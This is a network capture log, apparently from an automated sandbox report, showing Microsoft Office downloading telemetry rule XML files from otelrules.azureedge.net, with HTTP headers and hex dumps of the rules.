                                              2024-10-25 13:46:00 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              68192.168.2.44981413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:00 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:00 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:00 GMT
                                              Content-Type: text/xml
                                              Content-Length: 491
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                              ETag: "0x8DC582B98B88612"
                                              x-ms-request-id: d4d27aa7-601e-0002-1812-22a786000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134600Z-16849878b785f8wh85a0w3ennn000000099g000000006xx6
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:00 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              69192.168.2.44981513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:00 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:01 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:00 GMT
                                              Content-Type: text/xml
                                              Content-Length: 416
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                              ETag: "0x8DC582BAEA4B445"
                                              x-ms-request-id: 95c67357-201e-0051-60f5-247340000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134600Z-15b8d89586flzzks5bs37v2b9000000004y0000000002bsh
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:01 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              70192.168.2.44981613.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:01 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:01 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:01 GMT
                                              Content-Type: text/xml
                                              Content-Length: 479
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                              ETag: "0x8DC582B989EE75B"
                                              x-ms-request-id: 352988b4-001e-0065-3a25-260b73000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134601Z-r197bdfb6b4hdk8h12qtxfwscn0000000190000000005wra
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:01 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              71192.168.2.44981713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:01 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:01 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:01 GMT
                                              Content-Type: text/xml
                                              Content-Length: 415
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                              ETag: "0x8DC582BA80D96A1"
                                              x-ms-request-id: 4a7bd2a8-301e-0096-209e-26e71d000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134601Z-16849878b78smng4k6nq15r6s4000000022000000000fdvf
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:01 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              72192.168.2.44981813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:01 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:01 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:01 GMT
                                              Content-Type: text/xml
                                              Content-Length: 471
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                              ETag: "0x8DC582B97E6FCDD"
                                              x-ms-request-id: 628e7349-b01e-003d-63fd-24d32c000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134601Z-15b8d89586fst84k5f3z220tec0000000ga0000000000ke5
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:01 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              73192.168.2.44981913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:01 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:01 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:01 GMT
                                              Content-Type: text/xml
                                              Content-Length: 419
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                              ETag: "0x8DC582B9C710B28"
                                              x-ms-request-id: c1b2f9d4-701e-0098-1062-26395f000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134601Z-16849878b78jfqwd1dsrhqg3aw000000098000000000nx7z
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:01 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              74192.168.2.44982013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:01 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:01 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:01 GMT
                                              Content-Type: text/xml
                                              Content-Length: 477
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                              ETag: "0x8DC582BA54DCC28"
                                              x-ms-request-id: 6c6fa777-201e-003c-1958-2630f9000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134601Z-17c5cb586f67p8ffw0hbk5rahw00000002ug000000005c6r
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:01 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              75192.168.2.44982113.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:02 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:02 UTC491INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:02 GMT
                                              Content-Type: text/xml
                                              Content-Length: 419
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                              ETag: "0x8DC582BB7F164C3"
                                              x-ms-request-id: 03f0aa2d-d01e-007a-29f2-24f38c000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134602Z-15b8d89586fqj7k5h9gbd8vs9800000001vg000000001av2
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              X-Cache-Info: L1_T2
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:02 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              76192.168.2.44982213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:02 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:02 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:02 GMT
                                              Content-Type: text/xml
                                              Content-Length: 477
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                              ETag: "0x8DC582BA48B5BDD"
                                              x-ms-request-id: 989513d0-f01e-0096-5813-2610ef000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134602Z-17c5cb586f6tzc2wdxudxz0zw8000000025g00000000cre1
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:02 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              77192.168.2.44982313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:02 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:03 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:02 GMT
                                              Content-Type: text/xml
                                              Content-Length: 419
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                              ETag: "0x8DC582B9FF95F80"
                                              x-ms-request-id: 3c5c3d60-c01e-0066-4c9e-26a1ec000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134602Z-16849878b787psctgubawhx7k8000000094g000000009np5
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:46:03 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              78192.168.2.44982513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:46:02 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:46:03 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:46:02 GMT
                                              Content-Type: text/xml
                                              Content-Length: 468
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                              ETag: "0x8DC582BB3EAF226"
                                              x-ms-request-id: 1c275e9e-901e-0048-342c-26b800000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134602Z-r197bdfb6b4gx6v9pg74w9f47s00000002a000000000d739
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
